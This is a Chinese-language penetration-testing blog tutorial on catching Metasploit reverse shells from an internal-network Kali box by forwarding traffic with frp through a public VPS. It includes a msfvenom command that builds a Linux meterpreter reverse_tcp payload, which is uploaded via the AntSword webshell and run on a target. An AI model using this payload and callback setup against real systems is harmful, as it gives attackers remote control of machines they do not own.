内网MSF接收反向shell(突发奇想的实验)
注:微信公众号,csdn,freebuf原创以及本博客,都为我本人。 转载请邮件告知!
免责声明:由于传播、利用本文所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担
关于处于内网环境的MSF接收反向连接shell
内网渗透两位主流工具无非cs与msf,CobaltStrike与Metasploit不一样,cs架构的它teamserver直接部署在外网ip上,做攻击使用连接方便,而msf没有。
另一方面,对一部分人来说,这种方法的作用某种情况下确确实实是多余的,可能是我的学习方式跟大家不大相同,刹那间的突发奇想,自己也就研究了一下,也是希望能帮助到想到这个问题的小伙伴。
前言
大家的MSF也几乎都是处于虚拟机中的内网环境,攻击的用处也大都是和cobaltstrike传递shell做后渗透。
但是,当我们的主动攻击目标是外网机器,或者说是不同且不通的内网环境,这种情况,我们该如何去接收反向的shell连接呢。
网上搜索关于msf教程,也通常都是在内网中做的演示,但是在渗透过程中不乏会遇到需要利用msf的exploit进行漏洞利用的过程,本文应运而生,文章创作目的意在帮助需要的小伙伴。
START
核心在于流量转发,使用到的工具
- frp
- 独立公网IP的vps
- xshell
- 蚁剑
frp配置、
frp的配置,使其可以互通
首先在内网kali和自己的vps上下载好frp,没钱买vps就去用提供端口转发的第三方服务,网上太多了。
简单配置一下
vps:frps配置
内网kali:frpc配置
连接vps的7000端口通信,并且把本地的2222端口映射到vps的8000端口
接下来测试一下连通性:
连通是成功的
注意:如果遇到ping通可以,但是nc不能通信,大家可以多换一个端口尝试
木马生成、
生成msf的木马
最简单的命令生成一个
1 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=外网IP LPORT=外网端口 -f elf > /test/shell.elf |
留意这个监听payload:linux/x64/meterpreter/reverse_tcp
之后把shell.elf下载到本地,再通过蚁剑上传到目标机器
流量转发、
启动frp进行流量转发
测试上线、
开启msf的监听,等待上线
这个时候注意默认的payload,是跟我们生成木马时使用的不一样,原则上用什么监听模式生成木马,就用什么监听模式接受反弹shell,所以要改成一样的。
我们选择监听本地,之所以是2222端口,因为我们前面讲到转发的本地端口是2222
目标机运行上传的shell.elf
成功接收到了shell
OK 结束
这是执行载荷去接收shell的案例,其实用执行命令反弹shell的话(比如ms17010),(不只是MSF)还有一些原理和实现方法是一样的,主要是端口转发。